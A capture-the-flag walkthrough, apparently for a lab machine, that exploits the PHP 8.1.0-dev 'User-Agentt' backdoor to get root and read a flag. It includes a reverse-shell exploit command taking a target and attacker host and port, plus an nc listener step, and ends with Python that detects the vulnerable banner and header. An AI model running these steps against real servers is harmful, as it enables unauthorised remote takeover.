 
Nmap Output:
 
 
When we look at the Nmap output and the --head information for the page, we see that the PHP version is 8.1.0.
 
 
When we search for vulnerabilities in PHP 8.1.0, we find a backdoor Remote Code Execution (RCE) vulnerability.
 
There are two ways to get a shell. First:
 
PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
 
 
We can download the exploit with curl.
 
 
We are root.
 
 
Commands are executed when written on a single line.
 
 
I tried to read /root/root.txt but the flag is not there.
 
Then let's search for .txt files with the “find” command.
 
 
We can see that our flag is in the home directory.
 
Then let's move on to the second way:
 
Reverse Shell
 
 

python3 exploit.py http://[TARGET_IP] [LHOST] [LPORT]

 
Also, don't forget nc.
 
 
Since we know the location of the flag, we can read it directly.
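
On the defensive side, this walkthrough leaves two things to look for: the PHP 8.1.0-dev banner in the response headers and the misspelled User-Agentt request header named in the exploit title. The Python below is an added example, not part of the original write-up; it checks raw HTTP messages for both, and its function names, sample messages and header values are constructed for illustration.

```python
import re

# Header name from the exploit title on this page (note the doubled "t").
BACKDOOR_HEADER = "user-agentt"
# Banner of the affected development build named in that title.
AFFECTED_BANNER = re.compile(r"PHP/8\.1\.0-dev\b", re.IGNORECASE)

def parse_headers(raw):
    """Return (lowercased name, value) pairs from a raw HTTP message head."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    pairs = []
    for line in head.split("\n")[1:]:  # skip the request/status line
        name, sep, value = line.partition(":")
        if sep:
            pairs.append((name.strip().lower(), value.strip()))
    return pairs

def server_is_affected(raw_response):
    """True if X-Powered-By advertises the 8.1.0-dev build."""
    return any(n == "x-powered-by" and AFFECTED_BANNER.match(v) is not None
               for n, v in parse_headers(raw_response))

def suspicious_requests(raw_requests):
    """Indexes of requests carrying the misspelled User-Agentt header."""
    return [i for i, req in enumerate(raw_requests)
            if any(n == BACKDOOR_HEADER for n, _ in parse_headers(req))]

# Constructed sample data (not captured from the target in the write-up).
SAMPLE_RESPONSE = ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
                   "X-Powered-By: PHP/8.1.0-dev\r\n\r\n")
OTHER_RESPONSE = "HTTP/1.1 200 OK\r\nX-Powered-By: PHP/8.1.1\r\n\r\n"
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: example.test\r\nUser-Agent: curl/8.0\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: example.test\r\n"
    "User-Agentt: <constructed placeholder>\r\n\r\n",
    "GET /a HTTP/1.1\r\nHost: example.test\r\nuser-agent: Mozilla/5.0\r\n\r\n",
]

if __name__ == "__main__":
    print("affected build:", server_is_affected(SAMPLE_RESPONSE))
    print("flagged request indexes:", suspicious_requests(SAMPLE_REQUESTS))
```

Most access-log formats do not record arbitrary request header names, so the request check needs full header capture (a proxy, WAF or packet capture) as its input.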